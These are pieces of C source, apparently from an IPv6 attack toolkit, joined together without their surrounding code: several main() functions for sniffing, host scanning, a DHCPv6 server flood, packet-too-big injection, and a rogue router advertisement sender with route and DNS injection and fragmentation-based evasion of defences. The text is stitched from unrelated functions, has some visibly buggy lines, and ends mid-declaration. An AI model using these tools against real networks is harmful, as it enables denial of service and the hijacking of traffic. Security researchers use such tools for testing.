int main(int argc, char *argv[]) {
char *interface, string[] = "ip6 and icmp6";
unsigned char *mac6, buf[512];
unsigned char *dst = thc_resolve6("ff02::2");
int i;
unsigned char *pkt = NULL;
int pkt_len = 0;
int rawmode = 0;
pcap_t *p;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "r")) >= 0) {
switch (i) {
case 'r':
thc_ipv6_rawmode(1);
rawmode = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
interface = argv[optind];
if ((mac6 = thc_get_own_mac(interface)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (argc - optind > 1 && argv[optind + 1] != NULL)
dst = thc_resolve6(argv[optind + 1]);
memset(buf, 0, sizeof(buf));
buf[0] = 1;
buf[1] = 1;
memcpy(buf + 2, mac6, 6);
i = 8;
memset(seen, 0, sizeof(seen));
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
return -1;
signal(SIGALRM, clean_exit);
alarm(5);
while (1) {
while (thc_pcap_check(p, (char *) dump_ra_reply, NULL) > 0);
usleep(100);
}
return 0;
}
int check_alive(pcap_t * p, char *interface, unsigned char *src, unsigned char *dst) {
int ret = -2;
time_t t;
while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0);
thc_ping6(interface, src, dst, 16, 1);
t = time(NULL);
while (ret < 0) {
if (thc_pcap_check(p, (char *) ignoreit, NULL) > 0)
ret = 1;
if (time(NULL) > t + 1 && ret == -2) {
thc_ping6(interface, src, dst, 16, 1);
ret = -1;
}
if (time(NULL) > t + 4 && ret < 0)
ret = 0;
}
return ret > 0 ? 1 : 0;
}
int main(int argc, char *argv[]) {
unsigned char *pkt1 = NULL, buf[24];
unsigned char *dst6 = NULL, *smac, dstmac[16] = "", *dmac = dstmac;
int pkt1_len = 0;
char *interface, string[64] = "icmp6";
pcap_t *p;
memset(buf, 0, sizeof(buf));
if (argc != 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
interface = argv[1];
sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1],
(unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]);
mac = argv[2];
if ((smac = thc_get_own_mac(interface)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
dst6 = thc_resolve6("ff02::1");
if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt1_len, NULL, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
memset(buf, 0, sizeof(buf));
buf[0] = 0x01;
buf[1] = 0x01;
memcpy(buf + 2, smac, 6);
buf[8] = 0x02;
buf[9] = 0x01;
memcpy(buf + 10, dmac, 6);
if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_INVNEIGHBORSOL, 0, 0, (unsigned char *) &buf, 16, 0) < 0)
return -1;
if (thc_generate_pkt(interface, smac, dmac, pkt1, &pkt1_len) < 0) {
fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
exit(-1);
}
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
printf("Sending inverse packet for %s\n", argv[1]);
thc_send_pkt(interface, pkt1, &pkt1_len);
sleep(1);
while (thc_pcap_check(p, (char *) check_packets, NULL));
return 0; // never reached
}
int main(int argc, char *argv[]) {
char *interface;
pcap_t *p;
int i;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "rk:")) >= 0) {
switch (i) {
case 'r':
rawmode = 1;
thc_ipv6_rawmode(1);
break;
case 'k':
key = optarg;
break;
default:
fprintf(stderr, "Unknown option\n");
exit(-1);
}
}
interface = argv[optind];
if ((f = fopen(argv[optind + 1], "w")) == NULL) {
fprintf(stderr, "Error: file %s cout not be created\n", argv[optind + 1]);
exit(-1);
}
if (key != NULL) {
memset(&bfkey, 0, sizeof(bfkey));
SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash);
BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash);
memset(vec, 0, sizeof(vec));
num = 0;
}
if ((p = thc_pcap_init(interface, "ip6")) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s\n", interface);
exit(-1);
}
while (1) {
thc_pcap_check(p, (char *) check_packets, NULL);
usleep(50);
}
return 0;
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
char wdatabuf[1024];
unsigned char *mac6 = mac, *src, *dst;
int i, s, len, pkt_len = 0, dlen = 0;
unsigned long long int count = 0;
pcap_t *p = NULL;
int do_all = 1, use_real_mac = 0, use_real_link = 0;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
while ((i = getopt(argc, argv, "d:nNr1")) >= 0) {
switch (i) {
case 'N':
use_real_link = 1; // no break
case 'n':
use_real_mac = 1;
break;
case '1':
do_all = 0;
break;
case 'd':
do_dns = 1;
dns_name = optarg;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac)
mac6 = thc_get_own_mac(interface);
if (argc - optind <= 1)
dst = thc_resolve6("ff02::1:2");
else
dst = thc_resolve6(argv[optind + 1]);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
if (src == NULL || mac6 == NULL) {
fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface);
exit(-1);
}
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
if (do_dns) {
memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
dlen = len + 8;
len += sizeof(dnsupdate1);
if (dns_name != NULL && strlen(dns_name) < 240) {
if (dns_name[0] != '.') {
wdatabuf[len] = '.';
wdatabuf[dlen - 5]++;
wdatabuf[dlen - 3]++;
len++;
}
memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
wdatabuf[dlen - 5] += strlen(dns_name) + 1;
wdatabuf[dlen - 3] += strlen(dns_name) + 1;
len += strlen(dns_name) + 1;
}
memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
len += sizeof(dnsupdate2);
}
printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface);
while (1) {
count++;
if (!use_real_link)
memcpy(src + 8, (char *) &count, 8);
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 32] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
mac[i + 2] = rand() % 256;
if (do_dns)
wdatabuf[i + dlen] = 'a' + rand() % 26;
}
if (!use_real_mac)
memcpy(wdatabuf + 22, mac, 6);
memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
// we have to tone it down, otherwise we will not get advertisements
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
printf("!");
pkt = thc_destroy_packet(pkt);
if (do_all) {
usleep(75);
while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
}
if (count % 1000 == 0)
printf(".");
}
return 0; // never reached
}
int main(int argc, char *argv[]) {
char *interface, mac[16] = "", dmac[16] = "";
unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL;
unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1];
unsigned char *dst = thc_resolve6("ff02::1");
unsigned char *dstmac = thc_get_multicast_mac(dst);
int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0;
unsigned char *pkt = NULL, *searchlist = NULL;
int pkt_len = 0;
pcap_t *p;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
memset(rbuf, 0, sizeof(rbuf));
memset(mac, 0, sizeof(mac));
while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) {
switch (i) {
case 'i':
interval = atoi(optarg);
break;
case 'm':
sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4],
(unsigned int *) &dmac[5]);
dstmac = dmac;
break;
case 'S':
sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
mac6 = mac;
break;
case 's':
if ((ip6 = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: can not resolve source ip address %s\n", optarg);
exit(-1);
}
break;
case 'M':
mtu = atoi(optarg);
if (mtu < 0 || mtu > 65535) {
fprintf(stderr, "Error: mtu argument is invalid: %s\n", optarg);
exit(-1);
}
if (mtu < 1228 || mtu > 1500)
fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing: %d\n", mtu);
break;
case 'n':
to_send = atoi(optarg);
if (to_send < 1 || mtu > 255) {
fprintf(stderr, "Error: -n argument is invalid, must be between 1 and 255: %s\n", optarg);
exit(-1);
}
break;
case 'A':
if (pcnt >= MAX_ENTRIES) {
fprintf(stderr, "Error: you can not define more than %d autoconfig addresses\n", MAX_ENTRIES);
exit(-1);
}
if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
fprintf(stderr, "Error: -A option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
exit(-1);
}
*ptr++ = 0;
if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-)
fprintf(stderr, "Error: -A option prefix length must be between 0 and 128: %s\n", optarg);
exit(-1);
}
if (size != 64)
fprintf(stderr, "Warning: -A option defines an unusual prefix length: %d\n", size);
if (index(optarg, ':') == NULL)
strcat(optarg, "::");
if ((routerip6 = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: -A option network is invalid: %s\n", optarg);
exit(-1);
}
pbuf[pcnt][0] = size % 256;
memcpy((char *) &pbuf[pcnt][1], routerip6, 16);
pcnt++;
break;
case 'a':
plife = atoi(optarg);
break;
case 'r':
rlife = atoi(optarg);
break;
case 'd':
dlife = atoi(optarg);
break;
case 'l':
llife = atoi(optarg);
break;
case 'T':
reach = atoi(optarg);
break;
case 't':
trans = atoi(optarg);
break;
case 'p':
if (strncasecmp(optarg, "low", 3) == 0)
prio = 0;
else
if (strncasecmp(optarg, "med", 3) == 0)
prio = 1;
else
if (strncasecmp(optarg, "hi", 2) == 0)
prio = 2;
else
if (strncasecmp(optarg, "res", 3) == 0)
prio = 3;
else {
fprintf(stderr, "Error: unknown priority, known keywords are low, medium and high: %s\n", optarg);
exit(-1);
}
break;
case 'R':
if (rcnt >= MAX_ENTRIES) {
fprintf(stderr, "Error: you can not define more than %d routes\n", MAX_ENTRIES);
exit(-1);
}
if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
fprintf(stderr, "Error: -R option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
exit(-1);
}
*ptr++ = 0;
if ((size = atoi(ptr)) < 0 && size > 255) { // yes we allow bad sizes :-)
fprintf(stderr, "Error: -R option prefix length must be between 0 and 128: %s\n", optarg);
exit(-1);
}
if (index(optarg, ':') == NULL)
strcat(optarg, "::");
if ((routerip6 = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: -R option network is invalid: %s\n", optarg);
exit(-1);
}
rbuf[rcnt][0] = size % 256;
memcpy((char *) &rbuf[rcnt][1], routerip6, 16);
rcnt++;
break;
case 'D':
if (dcnt >= MAX_ENTRIES) {
fprintf(stderr, "Error: you can not define more than %d DNS servers\n", MAX_ENTRIES);
exit(-1);
}
if ((dbuf[dcnt++] = thc_resolve6(optarg)) == NULL) {
fprintf(stderr, "Error: can not resolve DNS server %s\n", optarg);
exit(-1);
}
break;
case 'L':
searchlist = optarg;
break;
case 'E':
if (optarg == NULL) {
fprintf(stderr, "Error: no option type given for -E\n");
exit(-1);
}
for (j = 0; j < strlen(optarg); j++) {
switch (optarg[j]) { // fall through to be fail safe on accidental misuse
case '0': // fall through
case 'O':
do_overlap = 1;
break;
case 'o':
do_overlap = 2;
break;
case '1': // fall through
case 'l': // fall through
case 'L':
do_frag++;
break;
case 'h': // fall through
case 'H':
do_hop = 1;
break;
case 'd': // fall through
case 'D':
do_dst = 1;
break;
default:
fprintf(stderr, "Error: unknown evasion type %c!\n", optarg[j]);
exit(-1);
}
if ((do_frag && (do_dst || do_overlap)) || (do_dst && do_overlap)) {
fprintf(stderr, "Error: you can not use -E types 1, D, O and o together!\n");
exit(-1);
}
}
break;
case 'F':
ptr = strtok(optarg, ",");
while (ptr != NULL) {
if (strncasecmp(ptr, "man", 3) == 0)
flags = (flags | 128);
else if (strncasecmp(ptr, "oth", 3) == 0)
flags = (flags | 64);
else if (strncasecmp(ptr, "hom", 3) == 0)
flags = (flags | 32);
else if (strncasecmp(ptr, "prox", 4) == 0)
flags = (flags | 4);
else if (strncasecmp(ptr, "res", 3) == 0)
flags = (flags | 2);
else if (strncasecmp(ptr, "unk", 3) == 0)
flags = (flags | 1);
else {
fprintf(stderr, "Error: unknown flag: %s\n", ptr);
exit(-1);
}
ptr = strtok(NULL, ",");
}
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if ((argc - optind) < 1 || (argc - optind) > 2)
help(argv[0]);
if (do_hdr_size)
myoff = do_hdr_size;
interface = argv[optind];
if (argc - optind == 2)
if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]);
exit(-1);
}
if (mtu == 0)
mtu = thc_get_mtu(interface);
if (mac6 == NULL)
if ((mac6 = thc_get_own_mac(interface)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (ip6 == NULL)
if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) {
fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface);
exit(-1);
}
// if (dns == NULL)
// dns = thc_resolve6("ff02::fb");
frint = interface;
frip6 = ip6;
frmac = mac6;
frbuf = buf;
frbuf2 = buf2;
frbuf2len = sizeof(buf2);
memset(buf, 0, sizeof(buf));
memset(buf2, 0, sizeof(buf2));
memset(buf3, 0, sizeof(buf3));
if (llife > 0xffff)
llife = 0xffff;
llife = (llife | 0xff000000);
if (prio == 2)
llife = (llife | 0x00080000);
else if (prio == 0)
llife = (llife | 0x00180000);
else if (prio != 1)
llife = (llife | 0x00100000);
llife = (llife | (flags << 16));
buf[0] = reach / 16777216;
buf[1] = (reach % 16777216) / 65536;
buf[2] = (reach % 65536) / 256;
buf[3] = reach % 256;
buf[4] = trans / 16777216;
buf[5] = (trans % 16777216) / 65536;
buf[6] = (trans % 65536) / 256;
buf[7] = trans % 256;
// option mtu
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
i = 16;
// mac address option
buf[i++] = 1;
buf[i++] = 1;
memcpy(buf + i, mac6, 6);
i += 6;
// option prefix, put all in
if (pcnt > 0)
for (j = 0; j < pcnt; j++) {
buf[i++] = 3;
buf[i++] = 4;
buf[i++] = pbuf[j][0]; // prefix length
buf[i++] = 128 + 64;
buf[i++] = plife / 16777216;
buf[i++] = (plife % 16777216) / 65536;
buf[i++] = (plife % 65536) / 256;
buf[i++] = plife % 256;
buf[i++] = (plife / 2) / 16777216;
buf[i++] = ((plife / 2) % 16777216) / 65536;
buf[i++] = ((plife / 2) % 65536) / 256;
buf[i++] = (plife / 2) % 256;
i += 4; // + 4 bytes reserved
memcpy(&buf[i], (char *) &pbuf[j][1], 16);
i += 16;
}
// route option, put all in
if (rcnt > 0)
for (j = 0; j < rcnt; j++) {
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = rbuf[j][0]; // prefix length
if (prio == 2)
buf[i++] = 0x08; // priority, highest of course
else if (prio == 1)
buf[i++] = 0x00;
else if (prio == 0)
buf[i++] = 0x18;
else
buf[i++] == 0x10;
buf[i++] = rlife / 16777216;
buf[i++] = (rlife % 16777216) / 65536;
buf[i++] = (rlife % 65536) / 256;
buf[i++] = rlife % 256;
memcpy((char *) &buf[i], (char *) &rbuf[j][1], 16); // network
i += 16;
}
// dns option
if (dcnt > 0)
for (j = 0; j < dcnt; j++) {
buf[i++] = 0x19; // dns option type
buf[i++] = 0x03; // length
i += 2; // reserved
buf[i++] = dlife / 16777216;
buf[i++] = (dlife % 16777216) / 65536;
buf[i++] = (dlife % 65536) / 256;
buf[i++] = dlife % 256;
memcpy(buf + i, dbuf[j], 16); // dns server
i += 16;
}
// dns searchlist option
if (searchlist != NULL) {
buf[i] = 31;
buf[i + 4] = dlife / 16777216;
buf[i + 5] = (dlife % 16777216) / 65536;
buf[i + 6] = (dlife % 65536) / 256;
buf[i + 7] = dlife % 256;
if (searchlist[strlen(searchlist) - 1] == '.')
searchlist[strlen(searchlist) - 1] = 0;
m = 0;
while ((ptr = strstr(searchlist, ".,")) != NULL) {
m = strlen(ptr);
for (l = 1; l < m; l++)
ptr[l - 1] = ptr[l];
ptr[m - 1] = 0;
}
l = 0;
m = 0;
j = strlen(searchlist);
do {
k = 0;
ptr = index(&searchlist[l], '.');
if (ptr == NULL || (index(&searchlist[l], ',') != NULL && (char*)ptr > (char*)index(&searchlist[l], ','))) {
k = 1;
ptr = index(&searchlist[l], ',');
}
if (ptr != NULL)
*ptr = 0;
n = strlen(&searchlist[l]);
buf[i + 8 + m] = n;
memcpy(&buf[i + 8 + m + 1], &searchlist[l], n);
if (ptr == NULL)
l = j;
else
l += 1 + n;
m += 1 + n;
if (k || ptr == NULL)
m++; // end of domain entry
} while (l < j && ptr != NULL);
if (m % 8 > 0)
m = ( (m / 8) + 1 ) * 8;
buf[i + 1] = m/8 + 1;
i += m + 8;
}
frbuflen = i;
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
return -1;
if (do_hop) {
type = NXT_HBH;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
return -1;
}
if (do_frag) {
type = NXT_FRAG;
for (j = 0; i < do_frag; j++)
if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0)
return -1;
}
if (do_dst) {
if (type == NXT_ICMP6)
type = NXT_DST;
if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
return -1;
}
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, llife, buf, i, 0) < 0)
return -1;
if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
return -1;
frhdr = (thc_ipv6_hdr *) pkt;
//printf("DEBUG: RA size is %d bytes, do_dst %d, do_overlap %d\n", i + 8, do_dst, do_overlap);
// init pcap
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
printf("Starting to advertise router (Press Control-C to end) ...\n");
while (sent < to_send || to_send > 255) {
if (do_dst) {
thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232);
} else if (do_overlap) {
if (do_overlap == 1)
thc_send_as_overlapping_first_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
else
thc_send_as_overlapping_last_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
} else {
thc_send_pkt(interface, pkt, &pkt_len);
}
while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
sent++;
if (sent != to_send || to_send > 255)
sleep(interval);
}
return 0; // never reached
}
/**
Função principal que realiza o host scan IPv6 na rede
*/
int hostScan(int rawmode, // informa se o "raw mode" foi ativado ou nao
char *interface, // nome da interface de analise
unsigned char *multicast6, // endereco do grupo multicast de destino
unsigned char *router6, // roteador da rota parametrizada
unsigned char **routers) {
unsigned char *src6 = NULL, // endereco ip6 do host [que realiza o scan]
*mac = NULL, // endereco MAC do host [que realiza o scan]
string[64] = "ip6 and dst "; // Mascara de captura de pacotes [apenas 1pv6 e destino a ser marcado]
time_t passed; // timestamp do inicio do scan
pcap_t *p; // contexto pcap de captura
// obtendo seu proprio endereco ip6
src6 = thc_get_own_ipv6(interface, multicast6, PREFER_GLOBAL);
// se estiver operando em "raw mode" deve-se resolver seu proprio endereco MAC
if (rawmode == 0 && (mac = thc_get_mac(interface, src6, multicast6)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", thc_ipv62string(src6));
exit(-1);
}
// setar o endereco do host para a filtragem de pacotes recebidos
strcat(string, thc_string2notation(thc_ipv62string(src6)));
// make the sending buffer unique
memset(buf, 'A', sizeof(buf)); // Preenche o buffer com o caractere 'A'
time((time_t *) & buf[2]); // coloca da 3a posicao do buffer o tempo em segundos [padrao]
buf[10] = getpid() % 256; // coloca o valor do process id ..
buf[11] = getpid() / 256; // .. nas posicoes 11 e 12 do buffer
memcpy(&buf[12], multicast6, 4); // coloca o endereco de multicast na 13a posicao do buffer
// inicializa a interface de captura de pacotes com o filtro criado
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
// Envio do 1o pacote : Echo Request Comum
sendEchoRequest(interface, multicast6, src6, router6, routers, buf, mac, NULL);
// Envio do 2o pacote : Echo Request Com falha de Opções
sendEchoRequestOptions(interface, multicast6, src6, router6, routers, buf, mac);
// altera os dados do buffer ???
buf[0] = NXT_INVALID;
buf[1] = 1;
// Envio do 3o pacote : Echo Request Com dados Hop by Hop
sendEchoRequestHopByHop(interface, multicast6, src6, router6, routers, buf, mac);
// ???
while (thc_pcap_check(p, (char *) check_packets, NULL) > 0 && (alive_no == 0 || *multicast6 == 0xff));
// Anota o tempo de inicio
passed = time(NULL);
// enquanto nao se passam 5 segundos
while (passed + 5 >= time(NULL) && (alive_no == 0 || *multicast6 == 0xff))
thc_pcap_check(p, (char *) check_packets, NULL); // verifica os pacotes capturados
// fecha a interface de captura
thc_pcap_close(p);
// informa o numero de hosts ativos encontrados
//printf("Found %d systems alive\n", alive_no);
printf("\n");
printAliveSystems();
}
int main(int argc, char *argv[]) {
char string[] = "ip6 and ! src net f000::/4 and ! dst net f000::/4";
int rawmode = 0, i;
pcap_t *p;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "cr")) >= 0) {
switch (i) {
case 'r':
thc_ipv6_rawmode(1);
rawmode = 1;
offset = 0;
break;
case 'c':
loop = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 3)
help(argv[0]);
if (do_hdr_size)
offset = do_hdr_size;
interface = argv[optind];
mac6 = thc_get_own_mac(interface);
src6 = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL);
mtu = atoi(argv[optind + 2]);
if (src6 == NULL || mac6 == NULL) {
fprintf(stderr, "Error: invalid interface or IPv6 not available: %s\n", interface);
exit(-1);
}
if (argv[optind + 1][0] == '*' || argv[optind + 1][1] == '*') {
ip6 = NULL;
} else {
ip6 = thc_resolve6(argv[optind + 1]);
if (ip6 == NULL) {
fprintf(stderr, "Error: target address is invalid: %s\n", argv[optind + 1]);
exit(-1);
}
}
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
printf("Watching for %s from %s (Press Control-C to end) ...\n", loop == 0 ? "a packet" : "packets", argv[optind + 1]);
do {
thc_pcap_check(p, (char *) send_toobig, NULL);
usleep(25);
} while (go);
thc_pcap_close(p);
return 0;
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL;
char wdatabuf[1024], wdatabuf2[1024];
unsigned char *mac6 = mac, *src, *dst;
int i, s, len, len2, pkt_len = 0, pkt2_len = 0;
unsigned long long int count = 0;
pcap_t *p = NULL;
int do_all = 1, use_real_mac = 1, use_real_link = 1;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
while ((i = getopt(argc, argv, "dnNr1")) >= 0) {
switch (i) {
case 'N':
use_real_link = 1; // no break
case 'n':
use_real_mac = 1;
break;
case '1':
do_all = 0;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
dns_name = argv[optind + 1];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac)
mac6 = thc_get_own_mac(interface);
dst = thc_resolve6("ff02::1:2");
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
len2 = sizeof(inforeq);
memcpy(wdatabuf2, inforeq, len2);
printf("Sending DHCPv6 Solicitate message ...\n");
printf("Sending DHCPv6 Information Request message ...\n");
if (!use_real_link)
memcpy(src + 8, (char *) &count, 8);
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 32] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
mac[i + 2] = rand() % 256;
}
if (!use_real_mac)
memcpy(wdatabuf + 22, mac, 6);
if (!use_real_mac)
memcpy(wdatabuf2 + 18, mac, 6);
memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
printf("!");
if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0)
printf("!");
signal(SIGALRM, clean_exit);
alarm(3);
// i = thc_send_pkt(interface, pkt, &pkt_len);
pkt = thc_destroy_packet(pkt);
while (1) {
usleep(75);
while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
}
return 0; // never reached
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
// defines mac as 6 pieces and defines pkt as null.
char wdatabuf[1024];
//builds data buffer and sets memory size at 1024mb
unsigned char *mac6 = mac, *src, *dst;
//creates mac6 address usuing
